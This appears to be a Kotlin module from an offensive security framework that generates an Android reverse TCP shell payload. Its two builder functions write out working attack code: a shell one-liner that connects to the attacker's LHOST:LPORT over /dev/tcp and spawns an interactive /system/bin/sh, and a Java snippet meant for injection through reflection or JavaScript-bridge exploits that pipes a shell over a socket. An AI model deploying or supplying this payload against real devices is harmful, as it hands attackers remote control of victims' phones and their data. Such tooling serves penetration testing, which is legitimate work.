package anc.modules.payloads.singles.android

import anc.core.Options
import anc.core.Rank
import anc.core.optional
import anc.core.payload.Payload
import anc.core.payload.PayloadType
import anc.core.required
import rex.arch.Arch
import rex.arch.Platform

/**
 * Android reverse TCP shell — single-stage payload.
 *
 * Generates a POSIX shell command payload that, when executed on an Android device
 * via `adb shell`, `am start`, or a code-execution vulnerability, establishes a
 * reverse shell to LHOST:LPORT.
 *
 * Two delivery modes are supported (controlled by the TYPE option):
 *
 *   "cmd"  (default) — a raw POSIX shell one-liner piped into /system/bin/sh.
 *          Requires the target to have /proc/net/fds or a socat/busybox binary.
 *
 *   "java" — a self-contained Java snippet for injection into app-level code
 *          execution (e.g. JavaScript bridge, reflection exploit).
 *
 * The generated bytes are UTF-8 encoded command text ready to write to a file or
 * pipe to a shell interpreter.
 */
class ReverseShell : Payload() {
    override val name        = "Android Reverse TCP Shell"
    override val description = "Connects back to attacker and spawns /system/bin/sh"
    override val modulePath  = "singles/android/shell_reverse_tcp"
    override val payloadType = PayloadType.Single
    override val arch        = listOf(Arch.DALVIK, Arch.ARM, Arch.ARM64)
    override val platform    = listOf(Platform.ANDROID)
    override val rank        = Rank.GREAT
    override val authors     = listOf("anckit")

    override val options = Options().apply {
        required<String>("LHOST", "Attacker IP address", default = "127.0.0.1")
        required<Int>   ("LPORT", "Attacker port",       default = 4444)
        optional<String>("TYPE",  "Payload type: cmd | java", default = "cmd")
    }

    override suspend fun run() {
        val bytes = generate()
        printStatus("Generated ${bytes.size} bytes (${bytes.toString(Charsets.UTF_8).take(120)}...)")
    }

    override suspend fun generate(): ByteArray {
        val lhost = datastore["LHOST"]?.toString() ?: options["LHOST"]!!.default.toString()
        val lport = (datastore["LPORT"]?.toString() ?: options["LPORT"]!!.default.toString()).toInt()
        val type  = datastore["TYPE"]?.toString()  ?: options["TYPE"]!!.default.toString()
        return when (type.lowercase()) {
            "java" -> buildJavaPayload(lhost, lport)
            else   -> buildCmdPayload(lhost, lport)
        }.toByteArray(Charsets.UTF_8)
    }

    companion object {
        /**
         * Shell command payload.
         * Uses /proc/net TCP or a POSIX exec redirect if available.
         * Falls back to a background loop with /system/bin/sh -i.
         */
        fun buildCmdPayload(lhost: String, lport: Int): String =
            "exec /system/bin/sh -c 'exec /system/bin/sh -i 3<>/dev/tcp/$lhost/$lport >&3 2>&3'"

        /**
         * Java snippet payload — suitable for injection via reflection or JS bridge exploits.
         * When executed it forks a thread that connects back and runs /system/bin/sh.
         */
        fun buildJavaPayload(lhost: String, lport: Int): String = """
            new Thread(() -> {
                try {
                    java.net.Socket s = new java.net.Socket("$lhost", $lport);
                    ProcessBuilder pb = new ProcessBuilder("/system/bin/sh");
                    pb.redirectInput(s.getInputStream());
                    pb.redirectOutput(s.getOutputStream());
                    pb.redirectErrorStream(true);
                    pb.start().waitFor();
                } catch (Exception ignored) {}
            }).start();
        """.trimIndent()
    }
}
